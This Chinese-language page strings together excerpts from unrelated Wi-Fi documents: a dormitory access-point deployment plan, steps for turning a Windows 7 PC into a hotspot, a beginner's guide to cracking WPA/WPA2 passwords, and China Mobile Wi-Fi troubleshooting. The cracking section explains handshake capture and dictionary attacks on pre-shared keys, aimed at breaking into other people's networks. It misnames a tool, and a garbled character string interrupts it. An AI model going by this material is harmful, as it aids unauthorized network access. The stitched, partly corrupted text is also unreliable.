接入示意图1.1 AC控制器旁路模式接入,仅负责对无线网【AP进行统一的管理】,【无线策略下发】; 2.3 AP部署 2.3.1宿舍网络设备布置 根据现场情况,宿舍楼1--6楼部署AP,每层楼部署3个AP,在宿舍楼3楼楼梯k 口安装机柜,放置交换机、路由器等网络设备,具体部署图如下: 图表 1 网络设备部署图 大图见附件一。 2.3.2特点 AP工作模式:瘦AP模式。所有AP由放置在中心机房的无线控制器(AC)统一配置管理,AP直接连接在相应的接入层交换机即可,不需单独配置每一个AP。 802.11n:无线系统支持802.11a/b/g和802.11n,最大接入带宽150M。 AP自适应功能:AP自动计算并选择合适的信道于功率,避免同频干扰。
如何在无宽带情况下自制WIFI无线上网
将win7电脑变身WiFi热点,让手机、笔记本共享上网 用win7建立无线局域网,可以共享上网可以局域网游戏。 开启windows 7的隐藏功能:虚拟WiFi和SoftAP(即虚拟无线AP),就可以让电脑变成无线路由器,实现共享上网,节省网费和路由器购买费。宏碁、惠普笔记本和诺基亚N97mini亲测通过。 以操作系统为win7的笔记本或装有无线网卡的台式机作为主机。 主机设置如下: 1、以管理员身份运行命令提示符: 快捷键win+R→输入cmd→回车 2、启用并设定虚拟WiFi网卡: 运行命令:netsh wlan set hostednetwork mode=allow ssid=wuminPC key=wuminWiFi 此命令有三个参数,mode:是否启用虚拟WiFi网卡,改为disallow则为禁用。 ssid:无线网名称,最好用英文(以wuminPC为例)。 key:无线网密码,八个以上字符(以wuminWiFi为例)。 以上三个参数可以单独使用,例如只使用mode=disallow可以直接禁用虚拟Wifi网卡。
开启成功后,网络连接中会多出一个网卡为“Microsoft Virtual WiFi Miniport Adapter”的无线连接2,为方便起见,将其重命名为虚拟WiFi。若没有,只需更新无线网卡驱动就OK了。 3、设置Internet连接共享: 在“网络连接”窗口中,右键单击已连接到Internet的网络连接,选择“属性”→“共享”,勾上“允许其他······连接(N)”并选择“虚拟WiFi”。 确定之后,提供共享的网卡图标旁会出现“共享的”字样,表示“宽带连接”已共享至“虚拟WiFi”。
教您破解wpa无线网络密码
教你如何破解无线网络wpa2密码 在动手破解WPA/WPA2前,应该先了解一下基础知识,本文适合新手阅读 首先大家要明白一种数学运算,它叫做哈希算法(hash).这是一种不可逆运算,你不能通过运算结果来求解出原来的未知数是多少,有时我们还需要不同的未知数通过该算法计算后得到的结果不能相同,即你不太可能找到两个不同的值通过哈希得到同一个结果。哈希是一类算法的统称(暂停!移动你的鼠标-猛击右图 ),通常哈希算法都是公开的,比如MD5,SHA-1等等。 我们平时说的WPA密码其实叫PSK(pre-shared key),长度一般是8-63字节,它加上ssid通过一定的算法可以得到PMK(pairwise master key)。 PMK=SHA-1(ssid,psk),PMK的长度是定长的,都是64字节。由于计算PMK的过程开销比较大,是我们破解花费时间长的关键,所以采用以空间换时间的原则把PMK事先生成好,这个事先生成好的表就是常说的HASH表(生成PMK的算法是一种哈希),这个工作就是用airlib-ng这个工具来完成的,我们的快速破解就是这么来的。 认证的时候会生成一个PTK(pairwise temporary),这是一组密钥,具体细节不详细说了,它的生成方法也是采用的哈希,参数是连接的客户端MAC地址、AP的BSSID、A-NONCE、S-NONCE、PMK,其中A-NONCE和S-NONCE是两个随机数,确保每次连接都会生成不同的PTK。PTK的计算消耗很小。PTK加上报文数据采用一定的算法(AES 或TKIP),得到密文,同时会得到一个签名,叫做MIC(message integrality check),tkip之所以被破解和这个mic有很大关系。 四次握手包中含有以上的哪些东西呢?客户端的MAC地址,AP的BSSID,A-NONCE,S-NONE,MIC,最关键的PMK和PTK是不包含在握手包里的! 认证的原理是在获得以上的所有参数后,客户端算出一个MIC,把原文连同MIC 一起发给AP,AP采用相同的参数与算法计算出MIC,并与客户端发过来的比较,如果一致,则认证通过,否则失败。 目前的破解方法是我们获得握手包后,用我们字典中的PSK+ssid先生成PMK(如果有HASH表则略过),然后结合握手包中的(客户端MAC,AP的BSSID,A-NONCE, S-NONCE)计算PTK,再加上原始的报文数据算出MIC并与AP发送的MIC比较,如果一致,那么该PSK就是密钥。- U# {6 B& ^; [% H3 ~ |" A9 t 目前最耗时的就是算PMK,可谓破解的瓶颈。即使搞定了运算量的问题,海量的密钥存储也是个问题(PMK都是64字节长度)!
移动WIFI无线上网常见故障及处理
WIFI无线上网使用方法与常见问题处理基本连接CMCC进行无线上网方法(XP系统) 1.首先确认电脑或者笔记本是否带有无线网卡,辨认方式:在电脑屏幕的下方,有一个“基站发射塔”形状的表示。同时打开电脑上无线网卡开关(笔记本的无线网卡有单独的开关,如果不用无线网卡,可以关闭)。 2.右键单击桌面左边的“网上邻居”,选择“属性”,打开如下图的网络链接,选择“无线网络连接”。 (WIN 7系统直接单击右下角的基站发射塔图标,选择CMCC并成功连接后,跳至第5步) 3.右键点击“无线网络连接”,选择“查看可用的无线连接” 4.进入后,查找中国移动的WLAN无线网络,然后连接,连接正常后会出现如图所示,如果有电信的也可以在这里面发现。 5.打开IE浏览器,并输入任何网址,将会自动连接到移动的WLAN登录界面,在对应位置属于用户名(手机号码)、静态密码等信息。 6.输入正确的用户名与密码后,会进入到业务界面里面,这时就可以正常打开任何的网页,正常上网。 问题一:周围用户使用WIFI上网是正常的,但我的电脑连接无线网络 时搜索不到任何无线信号或打不开网页 答:这种情况多半是用户上网终端(电脑)异常导致的,请您排除以下问题: 1.无线网卡开关原因:确认是否打开无线网卡开关或无线网络连接处于“禁用”状态。现在笔记本电脑一般均有无线网卡开关键,如未打开此开关或无线网络连接处于“禁用”状态,则无法连接无线网络。 2.无线网络连接状态原因:确认是否无线网络连接处于“禁用”状态,无线网络连接处于“禁用”状态,则无法连接无线网络。 3.无线网络设置原因:查看无线网络→相关任务→更改首选网络顺序→用WINDOWS配置我的无线网络设置是否勾选,请勾选。 4.无线网卡驱动原因:无线网卡驱动没有安装或驱动安装不正确。请从自己笔记本的官方网站上下载对应的驱动程序(请区分操作系统:Windows XP/WIN 7)。 5.系统中毒原因:系统如果中毒,亦会造成无法连接到无线网络,请先对电脑进行杀毒操作,并可建议用户更换终端(电脑/手机或无线上网)尝试,基本可辨认出终端问题所在。 问题二:我已经搜索到无线信号并顺利连入无线网络,但打开浏览器访 问互联网时没有推送中国移动的认证页面问题 发生这种情况有几种可能: 1.确认是否连接:通常情况下,无线网卡会搜索到周边所有的无线信号,请确认是否连接到中国移动SSID SSID为CMCC的无线网络。 2.查看IP地址设置:在确认连接的SSID为CMCC(校园WLAN为CMCC—EDU)的情况下,